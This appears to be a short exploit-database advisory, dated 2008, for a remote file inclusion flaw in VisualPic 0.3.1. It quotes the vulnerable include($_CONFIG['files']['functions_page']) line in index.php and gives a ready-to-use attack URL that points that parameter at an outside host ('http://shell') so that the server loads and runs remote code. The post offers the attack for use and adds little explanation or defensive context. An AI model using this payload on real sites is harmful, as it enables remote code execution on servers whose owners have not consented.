id: 2822
date: 04/04/2008
title: VisualPic 0.3.1 Remote File Inclusion Vulnerability
author: Cr@zy_King
cves: 

===================================================
VisualPic 0.3.1 Remote File Inclusion Vulnerability
===================================================



^| Special Greatz All My Friends to str0ke \

^| VisualPic 0.3.1 Remote File Include \

^| Down : http://www.snarky.fr/index.php?page=telechargement-2 \

^| Error : include($_CONFIG['files']['functions_page']) ; \

^| Files : index.php \

^| Rfi : http://localhost/?_CONFIG[files][functions_page]=http://shell \ 



#  0day.today [2023-03-24]  #